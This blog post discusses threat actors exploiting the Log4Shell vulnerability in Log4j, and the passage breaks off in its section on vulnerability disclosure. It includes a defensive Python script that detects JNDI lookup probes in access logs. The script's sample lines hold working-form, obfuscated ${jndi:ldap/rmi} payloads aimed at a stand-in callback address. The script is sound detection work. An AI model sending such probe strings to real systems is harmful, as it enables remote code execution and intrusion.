Threat Actors Are Weaponizing the Log4j Vulnerability

The Ramifications of Public Vulnerability Disclosure

Alex Rodriguez
3 min read · Dec 16, 2021

Hello, World! Recent cyber news headlines regarding a critical vulnerability in Log4j, the popular Java-based logging library, have, as expected, been followed by the quick appearance of malware that exploits it. The flaw, dubbed Log4Shell (CVE-2021-44228), lets an attacker who can get a crafted string into a log message trigger a JNDI lookup against a server the attacker controls, which can lead to remote code execution on the logging host. In this blog, I'll talk about some of the recent and ongoing cyber incidents involving the exploitation of vulnerable Log4j applications and also give my opinion on whether critical vulnerabilities should be publicly disclosed or kept confidential between the relevant parties. With that out of the way, let's get started with some of the malware that has already been seen exploiting vulnerable Log4j applications.

Threat Actors At Work

Threat actors have been deploying malware that exploits applications running a vulnerable version of Log4j (2.0-beta9 through 2.14.1). According to a recent blog by Check Point, more than 44% of corporate networks worldwide have already been targeted by adversaries probing for the vulnerable library. Malware such as cryptojackers and ransomware has already infected many organizations globally. According to evidence gathered by Bitdefender, the threat actors behind the Muhstik botnet are attempting to exploit vulnerable applications in massive numbers, as is expected from a botnet, since its purpose is to compromise as many hosts as possible without regard for who the target is. Additionally, a new ransomware family called Khonsari has been spotted attacking Windows systems, and other attackers are leveraging the vulnerability to download the Orcus Remote Access Trojan. So should we disclose critical vulnerabilities to the public as soon as they are discovered? Read the next section for my answer.
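The probing that Check Point and Bitdefender describe leaves traces in the logs of anything that faces the internet, because the exploit string has to be written into a log message before the vulnerable lookup fires. The Python script below is an added example, not code from the original post or from any of the vendors cited. It scans constructed sample access-log lines (not real captures) for `${jndi:...}` lookups, first undoing URL encoding and the nested `${lower:...}`, `${upper:...}` and `${...:-default}` lookups that attackers used to slip past simple string matching. The IP addresses, the log format and the choice of those three lookup forms are my own assumptions for illustration.

```python
import re
from typing import Dict, List
from urllib.parse import unquote

# Constructed sample access-log lines for the demo (not real captures).
# Line 1 is benign; lines 2-4 carry Log4Shell probes of increasing obfuscation.
SAMPLE_LOG_LINES: List[str] = [
    '10.0.0.5 - - [12/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    # Plain probe placed in the User-Agent header
    '10.0.0.9 - - [12/Dec/2021:10:01:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    # Nested ${lower:x} lookups so the literal string "jndi" never appears
    '10.0.0.9 - - [12/Dec/2021:10:01:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://198.51.100.7:1389/a}"',
    # URL-encoded probe in a query parameter, spelled out with ${::-x} default-value lookups
    '10.0.0.9 - - [12/Dec/2021:10:01:11 +0000] "GET /?x=%24%7B%24%7B%3A%3A-j%7D%24%7B%3A%3A-n%7D%24%7B%3A%3A-d%7D%24%7B%3A%3A-i%7D%3Armi%3A//198.51.100.7%3A1099/b%7D HTTP/1.1" 400 0 "-" "curl/7.79"',
]

# An innermost ${...} lookup: no nested braces or dollar signs inside.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")

# After normalization: a JNDI lookup and its URL scheme (ldap, ldaps, rmi, dns, ...).
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)


def _resolve(match: "re.Match[str]") -> str:
    """Evaluate one innermost lookup the way Log4j would, for the three forms
    attackers used as obfuscation. Anything else is returned untouched, so a
    real ${jndi:...} payload survives for the detector to see."""
    body = match.group(1)
    key = body.lower()
    if key.startswith("lower:"):
        return body[len("lower:"):].lower()
    if key.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:
        # ${name:-default}: the lookup fails, so Log4j substitutes the default.
        return body.split(":-", 1)[1]
    return match.group(0)


def normalize(text: str, max_passes: int = 20) -> str:
    """Undo URL encoding, then collapse obfuscating lookups from the inside
    out until the text stops changing (bounded, so hostile input can't loop)."""
    text = unquote(text)
    for _ in range(max_passes):
        collapsed = INNER_LOOKUP.sub(_resolve, text)
        if collapsed == text:
            break
        text = collapsed
    return text


def find_log4shell_probes(lines: List[str]) -> List[Dict[str, object]]:
    """Return one record per log line that contains a JNDI lookup once normalized."""
    hits: List[Dict[str, object]] = []
    for lineno, line in enumerate(lines, start=1):
        norm = normalize(line)
        m = JNDI_LOOKUP.search(norm)
        if not m:
            continue
        end = norm.find("}", m.start())
        payload = norm[m.start():end + 1] if end != -1 else norm[m.start():]
        hits.append({"line": lineno, "scheme": m.group(1).lower(), "payload": payload})
    return hits


if __name__ == "__main__":
    for hit in find_log4shell_probes(SAMPLE_LOG_LINES):
        print(f"line {hit['line']}: {hit['scheme']} lookup -> {hit['payload']}")
```

Two caveats when using something like this for triage. A probe in an access log is evidence of scanning, not of compromise: the same strings were sprayed at every host on the internet, including ones running no Java at all, so the next step is to check whether the receiving service actually loads a Log4j 2.x jar in the affected range and whether the logging host made an outbound LDAP or RMI connection to the callback address. Log4j also supports more lookup types than the three handled here (for example `${env:...}` and `${sys:...}`), so treat this normalizer as a starting point rather than a complete de-obfuscator.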

Public Disclosure of Critical Vulnerabilities

Whether or not disclosing critical vulnerabilities, such as Log4Shell, is the right thing to do, is still a topic of debate in the cyber community. There are organizations that believe it is the right move to publicly reveal the existence of vulnerabilities to ensure that impacted organizations are aware of the risks and can address them. However, other organizations have…

Alex Rodriguez

I am an Offensive Security Engineer @ Amazon who writes about cybersecurity and anything related to technology. Opinions are my own.